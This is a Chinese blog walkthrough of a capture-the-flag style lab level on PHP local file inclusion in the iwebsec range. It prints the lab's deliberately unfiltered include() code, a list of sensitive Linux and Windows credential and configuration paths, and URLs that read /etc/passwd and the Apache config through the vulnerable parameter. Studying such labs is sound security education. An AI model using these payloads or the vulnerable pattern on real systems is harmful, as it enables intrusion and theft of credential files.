iwebsec靶场 文件包含漏洞通关笔记1-本地文件包含漏洞

最新推荐文章于 2024-07-24 14:08:33 发布
最新推荐文章于 2024-07-24 14:08:33 发布
阅读量1.7k 收藏 16
点赞数 15
分类专栏: iwebsec靶场 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mooyuan/article/details/128065713
版权

目录

前言

1.File Inclusion(文件包含漏洞)概述

2.文件包含原理

3.文件包含分类

第01关 本地文件包含漏洞

1.打开靶场

2.源码分析

3.linux常用敏感文件路径

4.windows常用敏感文件路径

5.文件包含渗透

(1)访问test.txt

(2)敏感文件

前言

1.File Inclusion(文件包含漏洞)概述

文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了:
include(),include_once()
require(),require_once()
这些文件包含函数,这些函数在代码设计中被经常使用到。

2.文件包含原理

服务器执行一个PHP文件时可以通过文件包含函数执行另一个文件,无论这个文件是不是PHP为其后缀,都可以当成PHP执行。这本身并不是漏洞,但是当其以其解析特性讲任意文件当成PHP解析,这时候漏洞就出来了,假如:我们上传一张包含木马的图片,按照它的特性当成PHP解析,这时候漏洞就产生了。感觉主要是其对解析和执行包含的文件未进行辨别和控制和严格过滤造成的。

3.文件包含分类

文件包含分为本地文件包含和远程文件包含;

本地文件时包含本地服务器的文件,比如:你上传文件到它服务器,它进行包含和执行,如果文件存在恶意代码它同样会当成PHP进行执行;

远程文件包含可以通过http包含别的地址非本地的文件,如:包含别的服务器的文件进行包含执行。

第01关 本地文件包含漏洞

1.打开靶场

http://iwebsec.com:81/fi/01.phpicon-default.png?t=N7T8http://iwebsec.com:81/fi/01.php

2.源码分析

如下所示,有文件包含漏洞include函数的调用,并且未对传入参数filename做任何过滤,很明显存在文件包含漏洞

<?php

  require_once('../header.php');
  ?>
<html>
	<head>
		<title>本地文件包含</title>
	</head>
	<h2>本地文件包含</h2>
		<div class="alert alert-success">
			<p>/01.php?filename=test.txt </p>
		</div>
	<body>
<?php
	if(isset($_GET['filename'])){
	
    $filename  = $_GET['filename'];
    include($filename);
	}else{
		exit();
	}
?>

3.linux常用敏感文件路径

/root/.ssh/authorized_keys
/root/.ssh/id_rsa
/root/.ssh/id_ras.keystore
/root/.ssh/known_hosts //记录每个访问计算机用户的公钥
/etc/passwd
/etc/shadow
/etc/my.cnf //mysql配置文件
/etc/httpd/conf/httpd.conf //apache配置文件
/root/.bash_history //用户历史命令记录文件
/root/.mysql_history //mysql历史命令记录文件
/proc/mounts //记录系统挂载设备
/porc/config.gz //内核配置文件
/var/lib/mlocate/mlocate.db //全文件路径
/porc/self/cmdline //当前进程的cmdline参数

4.windows常用敏感文件路径

C:\boot.ini //查看系统版本
C:\Windows\System32\inetsrv\MetaBase.xml //IIS配置文件
C:\Windows\repair\sam //存储系统初次安装的密码
C:\Program Files\mysql\my.ini //Mysql配置
C:\Program Files\mysql\data\mysql\user.MYD //Mysql root
C:\Windows\php.ini //php配置信息
C:\Windows\my.ini //Mysql配置信息
C:\Windows\win.ini //Windows系统的一个基本系统配置文件

5.文件包含渗透

(1)访问test.txt

根据iwebsec靶场提示,访问test.txt

http://iwebsec.com:81/fi/01.php?filename=test.txticon-default.png?t=N7T8http://iwebsec.com:81/fi/01.php?filename=test.txt

test.txt的内容为<?php phpinfo();?>.服务器执行一个PHP文件时可以通过文件包含函数执行另一个文件,无论这个文件是不是PHP为其后缀,都可以当成PHP执行。

故而即使test.txt 的后缀为txt,也会按照php文件进行执行。

(2)敏感文件

访问/etc/passwd文件

iwebsec 靶场漏洞库iwebsecicon-default.png?t=N7T8http://iwebsec.com:81/fi/01.php?filename=/etc/passwd

访问Apache配置文件

iwebsec 靶场漏洞库iwebsecicon-default.png?t=N7T8http://iwebsec.com:81/fi/01.php?filename=/etc/httpd/conf/httpd.conf

 

mooyuan天天
关注
  • 15
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
PHP、Apache环境中部署upload-labs(文件上传漏洞靶场)
01-08
这就是 upload-labs(文件上传漏洞靶场)的价值所在。 upload-labs 是一款开源的练习 web 漏洞靶场工具,用 PHP 代码编写而成。需要 PHP 和 Apache 环境运行。下面我们将详细介绍如何在 PHP、Apache 环境中部署 ...
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
03-05
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
文件包含漏洞2 | iwebsec
weixin_52116519的博客
03-12 783
服务器可以过滤掉执行文件包含操作的符号,例如:\,// 等,以及 php 伪协议常用字符,例如input,output,filter 等,将这些字符进行有效过滤,可以减少恶意文件操作的可能。远程文件包含(remote file include,RFI)是指包含文件的位置并不在本地服务器,而是通过URL的形式包含到其他服务器上的文件,以及执行文件中的恶意代码。:通过可控的session值,传入恶意代码,找到session文件地址、文件名,通过文件包含漏洞包含session文件,达到getshell的目的。
iwebsec 文件包含篇 (已完结)
qq_60829702的博客
03-30 1944
iwebsec 文件包含,详细分析,持续更新
DVWA靶场-文件包含漏洞~保姆级教程!!!
2301_77360738的博客
05-11 1436
带你手把手感受dvwa靶场File Inclusion文件包含漏洞,超详细,小白可入!!!
文件包含漏洞1 | iwebsec
weixin_52116519的博客
03-06 897
正是这种灵活性, 从而导致客户端可以调用一个恶意文件,造成文件包含漏洞文件包含函数的参数没有经过过滤,可以被攻击者控制,包含其他恶意文件,导致了执行恶意的代码。PHP的文件包含可以直接执行包含文件的代码,包含的文件格式不受限制(无论是txt、图片文件还是远程URL,全都作为PHP代码执行),只要能正常执行即可。这个文件是我们通过文件上传点上传的,但是无法解析,我们可以利用这里的文件包含漏洞解析。的文件包含漏洞,大多出现在模块加载、模板加载和cache调用的地方。文件,写入如下代码,即01环境的代码。
iwebsec靶场 文件上传漏洞通关笔记4-文件头过滤绕过
mooyuan的博客
04-20 695
文件上传漏洞通常是由于程序员在对代码中文件上传部分的控制不足或者处理缺陷,而导致黑客可以越过其本身权限向服务器上上传可执行的恶意脚本文件。本次通过iwebsec靶场文件上传的第四关来讲解如何通过图片马实现文件头绕过过滤。
iwebsec靶场 文件上传漏洞通关笔记6-文件截断上传
mooyuan的博客
04-21 955
通过对iwebsec第六关卡讲解文件截断绕过的文件上传漏洞利用方法。magic_quotes_gpc函数在php中的作用是判断解析用户提示的数据,如包括有:post、get、cookie过来的数据增加转义字符“\”,对POST、POST、__GET以及进行数据库操作的sql进行转义处理,以确保这些数据不会引起程序,特别是数据库语句因为特殊字符引起的污染而出现致命的错误,可以防止sql注入。
iwebsec靶场 文件上传漏洞通关笔记5-.htaccess过滤绕过
mooyuan的博客
04-20 1146
htaccess文件全称是超文本入口,提供了针对目录改变配置的方法,即在一个特定的文档目录中放置一个包含一个或多个指令的文件,以作用于此目录及其所有子目录。htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。上传.htaccess文件,来绕过黑名单。(2)如何配置使.htaccess生效。
iwebsec靶场 文件包含漏洞通关笔记5-远程文件包含绕过
mooyuan的博客
04-20 1422
前言。
iwebsec靶场 文件上传漏洞通关笔记7-竞争条件文件上传
mooyuan的博客
04-21 1004
通过对iwebsec靶场文件上传的第七关卡讲解条件竞争法实现文件上传的方法,通过python脚本配合burpsuite工具实现渗透过程。
iwebsec靶场 文件包含漏洞通关笔记2-文件包含绕过(截断法)
mooyuan的博客
09-12 741
文件包含漏洞中,在服务器执行一个PHP文件时可以通过文件包含函数执行另一个文件,无论这个文件是不是PHP为其后缀,都可以当成PHP执行。文件上传的截断绕过通常源码包含如下字段,比如说传入的参数filename=phpinfo.txt,那么include时会为文件名加上 .html后缀,于是include的文件名就变为了phpinfo.txt.html,这样会导致文件包含漏洞利用出现失败。
文件上传漏洞练习靶场upload-labs
07-05
1. **不受限的文件类型上传**:这类漏洞通常发生在服务器未对上传文件的类型进行严格检查时,攻击者可以上传任意类型的文件,包括可能包含恶意代码的脚本文件(如.php、.asp等)。 2. **文件名重写漏洞**:当服务器...
web-渗透-文件上传漏洞专题靶场.rar
03-14
靶场为二十一个关于文件上传漏洞的环境,从前端绕过、服务器绕过、木马图上传绕过、截断绕过、竞争条件等等几乎包含目前所有的文件上传漏洞类型,刷完即掌握文件上传漏洞的所有要点。 文件中打包了所需的所有环境...
渗透测试上传漏洞经典靶场学习-upload-labs
07-02
渗透测试上传漏洞经典靶场学习-upload-labs
大坝安全监测设备有哪些主要功能?
最新发布
yyth13276363312的博客
07-24 296
12。3. **实时预警和报警处理**:提供精准的安全预警信息,及时处理可能的危险情况12。1. **实时监测大坝的各项物理参数**:包括应变、位移、水位、流量等12。6. **环境量监测**:包括上/下游水位、气温、降水量等11
内网安全:IPC横向
8888的博客
07-23 680
IPC是为了实现进程之间的通信而开放的管道。IPC可以通过验证用户名和密码来获取相应的权限。通过IPC可以与目标机器建立连接。
HDShredder 7 企业版案例分享: 依照国际权威标准,安全清除企业数据
sanyuan7783的博客
07-24 1123
符合国际权威标准软件操作符合多种主流国际权威标准,包括 DoD 5200, BSI, VSITR, NCSC, NIST 及 GOST,支持擦除单个分区和区域,并可自由定制擦除模式。对于“Clear”清除级别,软件操作符合 ISO 27001, DIN 66399 以及 NIST SP 800-88R1要求。对于“Purge”级别,则使用 SecureErase 功能。安全擦除证书软件生成准确的安全清除证书,包括时间戳、序列号、以及清除过程的所有细节信息。远程擦除 - 使用 NetDisk 技术。
文件上传漏洞靶场通关方法
02-29
文件上传漏洞是指攻击者通过上传恶意文件来执行任意代码或获取系统权限的一种安全漏洞。为了防止这种漏洞的发生,我们需要在应用程序中实施一些安全措施。以下是一些通用的文件上传漏洞防御方法: 1. 文件类型检查:在上传文件之前,应该对文件的类型进行检查,只允许上传合法的文件类型。可以通过检查文件的扩展名或者使用文件魔术数字来进行验证。 2. 文件名检查:对于上传的文件名,应该进行严格的检查,防止包含特殊字符或路径遍历等攻击。 3. 文件内容检查:在上传文件后,应该对文件内容进行检查,确保文件不包含恶意代码或脚本。 4. 文件大小限制:限制上传文件的大小,避免上传过大的文件导致服务器资源耗尽。 5. 文件存储位置:将上传的文件存储在非Web根目录下,避免直接访问上传文件。 6. 访问权限控制:对上传的文件设置适当的访问权限,确保只有授权用户可以访问。 7.
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

mooyuan天天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值